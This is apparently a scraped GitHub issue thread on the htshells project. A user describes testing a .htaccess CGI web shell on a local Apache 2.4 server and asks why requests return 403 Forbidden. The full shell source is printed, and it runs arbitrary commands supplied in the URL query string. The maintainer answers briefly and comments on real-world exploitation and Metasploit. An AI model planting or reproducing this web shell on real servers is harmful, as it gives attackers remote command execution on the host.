Comments (4)
htshells should work on Apache2. Did you uncomment the line per the comments in the file?
from htshells.
To set this up:
- I installed an Ubuntu 20.04 (server).
apt-get update
andapt-get dist-upgrade
apt-get install apache2
a2enmod cgi
apache2ctl restart
- confirm we're in working order:
ubuntu@ubuntu2004:~$ curl --silent 127.0.0.1 | head <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- Modified from the Debian original for Ubuntu Last updated: 2016-11-16 See: https://launchpad.net/bugs/1288690 --> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
wget -O /var/www/html/.htaccess https://raw.githubusercontent.com/wireghoul/htshells/master/sh ell/mod_cgi.shell.bash.htaccess
chmod +x /var/www/html/.htaccess
sed -i 's/# Require all granted/ Require all granted/' /var/www/html/.htaccess
- Double check we're all good:
ubuntu@ubuntu2004:~$ cat /var/www/html/.htaccess #!/bin/sh # Self contained .htaccess web shell - Part of the htshell project # Written by Wireghoul - http://www.justanotherhacker.com # IMPORTANT: Needs chmod +x to run # Run commands via http://url/.htaccess?cmd (ie: http://url/.htaccess?uname -a) # Big shout out to the rosetta code website which provided the example below! # This is considered a line spanning comment in apache and not by shell #winning \ echo -en "Content-Type: text/plain\r\n\r\n";cmd=$(echo $QUERY_STRING | sed -e's/+/ /g' -e's/%20/ /g');echo "\$ $cmd";$cmd 2>&1;exit # The exit ensures we never reach the following lines which would break the shell parser # Override default deny rule to make .htaccess file accessible over web <Files ~ "^\.ht"> # Uncomment the line below for Apache2.4 and newer Require all granted Order allow,deny Allow from all </Files> # Enable CGI Options +ExecCGI #Make apache treat .htaccess as a cgi file AddHandler cgi-script .htaccess
apache2ctl restart
(just to be certain everything is correct)- Give it a go:
curl --silent "http://127.0.0.1/.htaccess?whoami" | head
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
- Logs
ubuntu@ubuntu2004:~$ tail -n 1 /var/log/apache2/error.log
[Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] [client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess
All changes to server are listed here. However, for sake of consistency, here's the only enabled site config:
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
Thus, it seems the default config is blocking this in some way shape or form. I spent some time trying to debug, but didn't make any progress.
from htshells.
any updates?
from htshells.
Sorry, there is no unpaid tech support for this project. Between this talk (https://youtu.be/p1aCTBZrIOw) the Apache documentation and your server logs you should be able to figure it out.
In most real world scenarios I've seen you usually only get one shot at generating the correct htaccess file for the server config in use. Or you can write a specific exploit for a known configuration. Tbh I'd rather not see htshells as a payload function in metasploit, as I fear that will just generate a large number of support requests from users who had their exploit fail and use GitHub to demand answers.
from htshells.
Related Issues (3)
- stealth htaccess problem HOT 1
- Problem reading htaccess HOT 4
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from htshells.